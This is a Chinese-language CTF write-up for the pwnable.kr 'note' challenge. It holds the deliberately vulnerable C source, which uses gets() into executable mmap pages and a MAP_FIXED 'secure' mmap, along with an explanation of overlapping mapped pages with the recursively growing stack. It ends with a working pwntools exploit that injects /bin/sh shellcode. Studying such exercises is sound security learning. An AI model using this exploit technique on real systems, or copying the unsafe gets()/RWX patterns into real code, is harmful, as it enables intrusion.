先放源码:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/types.h>
#include <unistd.h>
#define PAGE_SIZE 4096
void *mmap_s(void *addr, size_t length, int prot, int flags, int fd, off_t offset);
void *mem_arr[257];
void clear_newlines(void)
{
int c;
do
{
c = getchar();
} while (c != '\n' && c != EOF);
}
void create_note()
{
int i;
void *ptr;
for (i = 0; i < 256; i++)
{
if (mem_arr[i] == NULL)
{
ptr = mmap_s((void *)NULL, PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
mem_arr[i] = ptr;
printf("note created. no %d\n [%08x]", i, (int)ptr);
return;
}
}
printf("memory sults are fool\n");
return;
}
void write_note()
{
unsigned int no;
printf("note no?\n");
scanf("%d", &no);
clear_newlines();
if (no > 256)
{
printf("index out of range\n");
return;
}
if (mem_arr[no] == NULL)
{
printf("empty slut!\n");
return;
}
printf("paste your note (MAX : 4096 byte)\n");
gets(mem_arr[no]);
}
void read_note()
{
unsigned int no;
printf("note no?\n");
scanf("%d", &no);
clear_newlines();
if (no > 256)
{
printf("index out of range\n");
return;
}
if (mem_arr[no] == NULL)
{
printf("empty slut!\n");
return;
}
printf("%s\n", mem_arr[no]);
}
void delete_note()
{
unsigned int no;
printf("note no?\n");
scanf("%d", &no);
clear_newlines();
if (no > 256)
{
printf("index out of range\n");
return;
}
if (mem_arr[no] == NULL)
{
printf("already empty slut!\n");
return;
}
munmap(mem_arr[no], PAGE_SIZE);
mem_arr[no] = NULL;
}
void select_menu()
{
// menu
int menu;
char command[1024];
printf("- Select Menu -\n");
printf("1. create note\n");
printf("2. write note\n");
printf("3. read note\n");
printf("4. delete note\n");
printf("5. exit\n");
scanf("%d", &menu);
clear_newlines();
switch (menu)
{
case 1:
create_note();
break;
case 2:
write_note();
break;
case 3:
read_note();
break;
case 4:
delete_note();
break;
case 5:
printf("bye\n");
return;
case 0x31337:
printf("welcome to hacker's secret menu\n");
printf("i'm sure 1byte overflow will be enough for you to pwn this\n");
fgets(command, 1025, stdin);
break;
default:
printf("invalid menu\n");
break;
}
select_menu();
}
int main()
{
setvbuf(stdout, 0, _IONBF, 0);
setvbuf(stdin, 0, _IOLBF, 0);
printf("welcome to pwnable.kr\n\n");
sleep(2);
printf("recently I noticed that in 32bit system with no ASLR,\n");
printf(" mmap(NULL... gives predictable address\n\n");
sleep(2);
printf("I believe this is not secure in terms of software exploit mitigation\n");
printf("so I fixed this feature and called mmap_s\n\n");
sleep(2);
printf("please try out this sample note application to see how mmap_s works\n");
printf("you will see mmap_s() giving true random address despite no ASLR\n\n");
sleep(2);
printf("I think security people will thank me for this :)\n\n");
sleep(2);
select_menu();
return 0;
}
// secure mmap
void *mmap_s(void *addr, size_t length, int prot, int flags, int fd, off_t offset)
{
// security fix: current version of mmap(NULL.. is not giving secure random address
if (addr == NULL && !(flags & MAP_FIXED))
{
void *tmp = 0;
int fd = open("/dev/urandom", O_RDONLY);
if (fd == -1)
exit(-1);
if (read(fd, &addr, 4) != 4)
exit(-1);
close(fd);
// to avoid heap fragmentation, lets skip malloc area
addr = (void *)(((int)addr & 0xFFFFF000) | 0x80000000);
while (1)
{
// linearly search empty page (maybe this can be improved)
tmp = mmap(addr, length, prot, flags | MAP_FIXED, fd, offset);
if (tmp != MAP_FAILED)
{
return tmp;
}
else
{
// memory already in use!
addr = (void *)((int)addr + PAGE_SIZE); // choose adjacent page
}
}
}
return mmap(addr, length, prot, flags, fd, offset);
}
write_note中含栈溢出,在调试的过程中可以发现申请的堆读写执行权限是全开的:
也就是说,在堆上写shellcode并且栈溢出到shellcode的返回地址就能getshell。但问题是write_note的逻辑明显是在堆上做溢出,不能直接getshell。
然后就是这个程序最为精髓的地方:递归。select_menu函数没有用死循环实现而是直接递归,这意味着栈在递归的过程中会不断累积。
但让栈不断累积并且直接达到堆是不可能的,栈一旦超出应有的范围程序会直接崩掉。这似乎推翻了前面所做的假设:用栈去和堆交叠然后用堆作溢出。
最后也是这一程序能exploit的最关键部分:自定义mmap函数实际上有概率令堆和栈的位置交叠,可以看到mmap_s函数中的逻辑,其中:
addr = (void *)(((int)addr & 0xFFFFF000) | 0x80000000);
这一地址事实上是能够与栈交叠的,一些更多的细节,比如为什么能mmap到栈上的地址程序却不崩溃,需要参考mmap的文档:
MAP_FIXED
Don't interpret addr as a hint: place the mapping at
exactly that address. addr must be suitably aligned: for
most architectures a multiple of the page size is
sufficient; however, some architectures may impose
additional restrictions. If the memory region specified
by addr and length overlaps pages of any existing
mapping(s), then the overlapped part of the existing
mapping(s) will be discarded. If the specified address
cannot be used, mmap() will fail.
Software that aspires to be portable should use the
MAP_FIXED flag with care, keeping in mind that the exact
layout of a process's memory mappings is allowed to change
significantly between kernel versions, C library versions,
and operating system releases. Carefully read the
discussion of this flag in NOTES!
mmap开启了MAP_FIXED flag时,栈上的数据将会被舍弃,正因如此堆与栈数据重叠而不冲突时才能在栈上邻近的位置分配内存。
最后的问题来了:如何去预测堆和栈交叠的时刻?没有其他办法,猜!栈增长的大小是固定不变的,而栈的起始地址由于ASLR的存在难以预测,加上堆的地址生成来自于随机分配,exp成功的概率极小,需要多次尝试。我使用的栈初始地址为0xFFFFFFFF,最后是exp:
from pwn import *
r = process("./note")
def recv_menu():
r.recvuntil(b"5. exit\n")
def create_note():
recv_menu()
r.sendline(b"1")
r.recvuntil(b"no ")
addr_no = int(r.recvline().strip(), 10)
r.recvuntil(b" [")
addr = int(r.recvuntil(b"]")[:-1], 16)
success("Create " + str(addr_no) + " note at: " + hex(addr))
return addr_no, addr
def write_note(no: int, msg: bytes):
recv_menu()
r.sendline(b"2")
r.recvuntil(b"note no?\n")
r.sendline(str(no).encode("utf-8"))
r.recvuntil(b"paste your note (MAX : 4096 byte)\n")
r.sendline(msg)
def delete_note(no: int):
recv_menu()
r.sendline(b"4")
r.recvuntil(b"note no?\n")
r.sendline(str(no).encode("utf-8"))
success("Delete note: " + str(no))
sleep(10)
stack_addr = 0xFFFFFFFF
stack_no = 0
while True:
no, addr = create_note()
if no == 255:
for i in range(256):
delete_note(i)
stack_addr -= 0x430 * 255
stack_addr -= 0x430
if addr > stack_addr:
stack_no = no
stack_addr = addr
break
success("Heap at: " + hex(addr) + "...." + "Stack at: " + hex(stack_addr))
shellcode = asm(shellcraft.sh())
shellcode_no, shellcode_addr = create_note()
write_note(shellcode_no, b"\x90" * 200 + shellcode)
write_note(stack_no, p32(shellcode_addr) * 1024)
recv_menu()
r.sendline(b"5")
r.interactive()
放一张本地成功的截图,远程需要ssh到服务器上跑。
更正一下用语的错误,mmap_s的并不是在堆上申请内存,而是与堆邻近的位置。
